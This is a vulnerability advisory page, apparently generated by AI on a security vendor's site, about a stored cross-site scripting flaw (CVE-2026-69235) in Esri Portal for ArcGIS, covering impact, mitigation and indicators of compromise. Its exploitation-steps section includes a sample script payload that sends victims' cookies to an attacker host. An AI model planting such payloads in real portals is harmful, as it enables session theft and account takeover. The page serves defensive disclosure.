CVE-2026-69235
Portal for ArcGIS vulnerability analysis and mitigation

Overview

CVE-2026-69235 is a stored cross-site scripting (XSS) vulnerability in Esri Portal for ArcGIS that may allow a remote, privileged attacker to inject malicious code that executes in a victim's browser. It affects Portal for ArcGIS versions 11.1 through 11.5 (inclusive), with users on ArcGIS Enterprise 11.1, 11.3, and 11.5 specifically encouraged to patch. The vulnerability was published on August 21, 2026, by Esri (Environmental Systems Research Institute, Inc.) and carries a CVSS v3.1 base score of 6.1 (Medium) (GitHub Advisory, Esri Blog).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) variant. A privileged attacker can inject malicious JavaScript or HTML into the portal, which is then stored server-side and subsequently rendered in the browsers of other users who visit the affected portal pages. Exploitation requires user interaction (a victim must visit the page containing the injected payload) but does not require the attacker to have elevated privileges beyond initial portal access, and no special attack complexity is needed (GitHub Advisory, Esri Blog).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of other portal users, enabling theft of session cookies, credentials, or sensitive data visible to those users, as well as performing unauthorized actions on their behalf within the portal. The scope change in the CVSS vector indicates that the impact extends beyond the attacker's own session to affect other users' browser contexts. Availability is not directly impacted, but confidentiality and integrity are both assessed as low-level impacts per the CVSS scoring (GitHub Advisory).

Exploitability

There is no known public proof-of-concept exploit and no evidence of active in-the-wild exploitation at the time of publication (GitHub Advisory). The EPSS score is approximately 0.177% (8th percentile), indicating a low near-term probability of exploitation. The vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.

Exploitation steps

  1. Reconnaissance: Identify internet-accessible Esri Portal for ArcGIS instances running versions 11.1 through 11.5 using tools like Shodan or Censys, or by reviewing organizational asset inventories.
  2. Obtain privileged access: Acquire a portal account with sufficient privileges to submit content (e.g., items, descriptions, or other user-controlled fields) to the portal.
  3. Inject malicious payload: Submit a crafted stored XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a portal field that is rendered without proper output encoding for other users.
  4. Wait for victim interaction: When another authenticated user browses to the page or item containing the injected payload, their browser executes the malicious script.
  5. Harvest data or perform actions: The script exfiltrates session cookies, credentials, or sensitive portal data to an attacker-controlled server, or performs actions within the portal on behalf of the victim (GitHub Advisory, Esri Blog).

Indicators of compromise

  • Network: Unexpected outbound HTTP/HTTPS requests from users' browsers to unknown external domains shortly after accessing portal pages; requests containing encoded cookie or credential data in query parameters.
  • Logs: Portal access logs showing unusual content submissions containing HTML/JavaScript tags (e.g., <script>, onerror=, javascript:) in user-controlled fields; repeated access to specific portal items by multiple distinct users followed by outbound connections.
  • File System / Application: Portal database or content store entries containing raw HTML or JavaScript in fields that should contain plain text or sanitized content.
  • Process/Browser: Browser developer tool network logs showing unexpected requests to third-party domains triggered by portal page loads.

Mitigation and workarounds

Esri recommends that all users upgrade to the latest long-term support release of ArcGIS Enterprise/Portal for ArcGIS. Users specifically running ArcGIS Enterprise versions 11.1, 11.3, and 11.5 are urged to apply the available security patches immediately. As a complementary measure, organizations should implement strict input validation and output encoding controls, restrict privileged portal user access to trusted individuals, and monitor portal activity for suspicious content submissions (Esri Blog, GitHub Advisory).

Additional resources


SourceThis report was generated using AI

Related Portal for ArcGIS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-69236MEDIUM6.1
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69235MEDIUM6.1
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69234MEDIUM6.1
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69237LOW3.8
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69238LOW3.5
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management